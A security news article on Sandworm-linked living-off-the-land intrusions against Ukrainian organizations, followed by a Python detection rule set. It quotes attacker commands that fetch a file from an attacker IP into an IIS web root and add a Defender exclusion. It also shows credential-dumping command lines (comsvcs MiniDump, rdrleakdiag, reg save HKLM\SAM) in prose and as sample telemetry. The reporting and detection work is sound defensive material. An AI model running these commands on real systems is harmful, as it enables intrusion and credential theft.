Ukrainian government organizations continue facing relentless cyber threats from Russian-backed threat actors employing sophisticated evasion techniques to maintain persistent network access.
Recent investigations have uncovered coordinated campaigns targeting critical infrastructure and government entities, with attackers deploying advanced tactics that circumvent traditional security defenses.
These operations mark a shift in approach: instead of immediate destructive effects, the attackers focus on credential harvesting and the theft of sensitive information, and on prolonged dwell time that lets them conduct extensive reconnaissance and keep a covert presence inside networks for months.
Symantec analysts and researchers identified two major intrusion incidents spanning a two-month operation against a large business services organization and a week-long campaign against local government infrastructure.
The attackers demonstrate exceptional operational security awareness, minimizing malware deployment while relying primarily on legitimate Windows administration tools and dual-use utilities to avoid detection.
The campaign appears linked to Sandworm, the threat group attributed to Russia's GRU military intelligence service and known for destructive attacks on critical infrastructure, including power grids and satellite communications networks.
Initial compromise came through webshells deployed on public-facing servers, most likely via unpatched vulnerabilities; this article does not identify the specific flaw. The attackers used the LocalOlive webshell as a persistent backdoor that let them execute commands on the host remotely.
Living-Off-the-Land Credential Harvesting Mechanisms
The evasion methodology reflects a clear understanding of how modern endpoint defenses work: they detect dropped malware far more reliably than misuse of signed, built-in Windows binaries.
Upon gaining initial access on June 27, 2025, the attackers immediately ran two commands through the webshell using built-in Windows utilities:
cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx
powershell Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloads
The first uses curl, which ships with current Windows builds, to fetch a file named service.aspx from 185.145.245.209 on port 22065 and write it straight into the IIS web root, where it is reachable over HTTP like any other page (aspnet_client is a standard ASP.NET directory, so the file blends in). The second adds the user's Downloads folder to Windows Defender's exclusion list, so anything staged there is never scanned. Add-MpPreference requires administrative privileges, so either the web application's worker process was already running with those rights or the attackers had escalated beforehand. The exclusion is easy to check for after the fact: Get-MpPreference lists the ExclusionPath entries on a host, and the change is recorded as event ID 5007 (configuration change) in the Microsoft-Windows-Windows Defender/Operational log.
They then created scheduled tasks that ran every thirty minutes and invoked the legitimate rundll32.exe with the MiniDump export of comsvcs.dll to write process memory dumps, from which credentials held in memory can be recovered. comsvcs.dll is a signed Microsoft DLL, so this produces a full dump of any target process without dropping a tool such as procdump or Mimikatz on disk.
The threat actors also ran process enumeration commands looking specifically for KeePass password vault processes; an unlocked KeePass instance holds decrypted vault data in memory, so dumping that process is a direct route to stored credentials.
Memory dumping continued with the Windows Resource Leak Diagnostic tool (rdrleakdiag.exe), a signed Microsoft binary whose /fullmemdmp option writes a full memory dump of a target process. It is seldom seen in intrusions, and detection content that covers comsvcs.dll, procdump and Task Manager dumps often does not cover it, which is precisely why it was chosen.
Registry hive export with the native reg.exe yielded further credential and configuration data; the standard form of this technique is reg save against the SAM, SECURITY and SYSTEM hives, which together contain local account hashes, cached secrets and the boot key needed to decrypt them.
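As an added example (not code from Symantec's report or from this article), here is a small Python rule set that flags the command lines described above in process-creation telemetry such as Sysmon Event ID 1 or Security event 4688 records. The two commands quoted from the report are used verbatim; the scheduled task, comsvcs MiniDump, rdrleakdiag and reg save lines are reconstructions of the standard syntax with an invented PID and output paths, and the w3wp.exe parent process, the record field names and the benign events are all constructed assumptions. It also generalizes slightly beyond the article by flagging any shell started by a web server worker process, which is the usual footprint of a webshell regardless of the commands that follow.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Detection:
    rule: str
    attack_id: str      # MITRE ATT&CK technique the rule maps to
    image: str          # basename of the process image
    command_line: str


# (rule name, ATT&CK ID, pattern) over the full command line. Patterns accept an
# optional ".exe", any argument order and any case, since these are stock Windows
# binaries and operators vary the spacing and quoting.
COMMAND_RULES = [
    # powershell Add-MpPreference -ExclusionPath|-ExclusionProcess|-ExclusionExtension ...
    ("defender_exclusion_added", "T1562.001",
     re.compile(r"Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension)\b", re.I)),
    # rundll32 comsvcs.dll, MiniDump <pid> <dumpfile> full  (#24 is the same export by ordinal)
    ("comsvcs_minidump", "T1003.001",
     re.compile(r"rundll32(?:\.exe)?\b.*comsvcs(?:\.dll)?\s*,\s*(?:MiniDump|#24)\b", re.I)),
    # rdrleakdiag /p <pid> /o <dir> /fullmemdmp /wait 1
    ("rdrleakdiag_fullmemdmp", "T1003",
     re.compile(r"rdrleakdiag(?:\.exe)?\b.*/fullmemdmp\b", re.I)),
    # reg save HKLM\SAM|SECURITY|SYSTEM <file>
    ("reg_save_hive", "T1003.002",
     re.compile(r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(?:sam|security|system)\b", re.I)),
    # curl ... > <anything>\inetpub\wwwroot\... : fetched content written into the IIS web root
    ("curl_to_webroot", "T1505.003",
     re.compile(r"\bcurl(?:\.exe)?\b.*>\s*\S*\\inetpub\\wwwroot\\", re.I)),
    # schtasks /create ... whose action runs one of the dumping binaries above
    ("scheduled_memory_dump", "T1053.005",
     re.compile(r"schtasks(?:\.exe)?\b.*/create\b.*(?:comsvcs|rdrleakdiag)", re.I)),
]

# A web server worker process has no business starting a shell; when it does, the
# command almost always arrived through a webshell (assumption: IIS w3wp.exe hosts the site).
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def scan_event(event: dict) -> list:
    """Return every Detection that fires on a single process-creation record."""
    cmd = event.get("command_line", "")
    image = _basename(event.get("image", ""))
    parent = _basename(event.get("parent_image", ""))
    hits = [Detection(name, attack_id, image, cmd)
            for name, attack_id, pattern in COMMAND_RULES if pattern.search(cmd)]
    if parent in WEB_WORKERS and image in SHELLS:
        hits.append(Detection("web_worker_spawned_shell", "T1505.003", image, cmd))
    return hits


def scan(events) -> list:
    return [hit for event in events for hit in scan_event(event)]


def rules_fired(events) -> list:
    """Sorted, de-duplicated rule names: the first thing a triage analyst wants to see."""
    return sorted({hit.rule for hit in scan(events)})


# Constructed telemetry. Events 0 and 1 carry the two command lines quoted in the
# article; the rest are standard-syntax reconstructions (PID 624 and the output paths
# are invented) plus two benign records that must not fire.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx"},
    {"parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloads"},
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r'schtasks /create /sc minute /mo 30 /tn SysHealth /tr "rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Users\Public\d.dmp full"'},
    {"parent_image": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Users\Public\d.dmp full"},
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\rdrleakdiag.exe",
     "command_line": r"rdrleakdiag.exe /p 624 /o C:\Users\Public /fullmemdmp /wait 1"},
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\reg.exe",
     "command_line": r"reg save HKLM\SAM C:\Users\Public\sam.hiv"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell Get-MpPreference"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit.rule:26} {hit.attack_id:10} {hit.image:15} {hit.command_line}")
```

The scheduled-task record fires twice on purpose (once for the task creation, once because its action contains the comsvcs MiniDump string), and the rundll32 child that the task later spawns under svchost.exe fires the comsvcs rule on its own, so the dump is caught even if the task creation was missed. On a live host the same hunt can be run against existing state rather than logs: Get-ScheduledTask exposes each task's Actions (Execute and Arguments), and Get-MpPreference exposes the ExclusionPath list.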
The campaign shows threat actors prioritizing stealth over speed: legitimate administration tools let their activity blend in with routine systems management while they systematically harvest sensitive organizational data over an extended period of network access.
The post Russian Hackers Attacking Government Entity Using Stealthy Living-Off-the-Land Tactics appeared first on Cyber Security News.

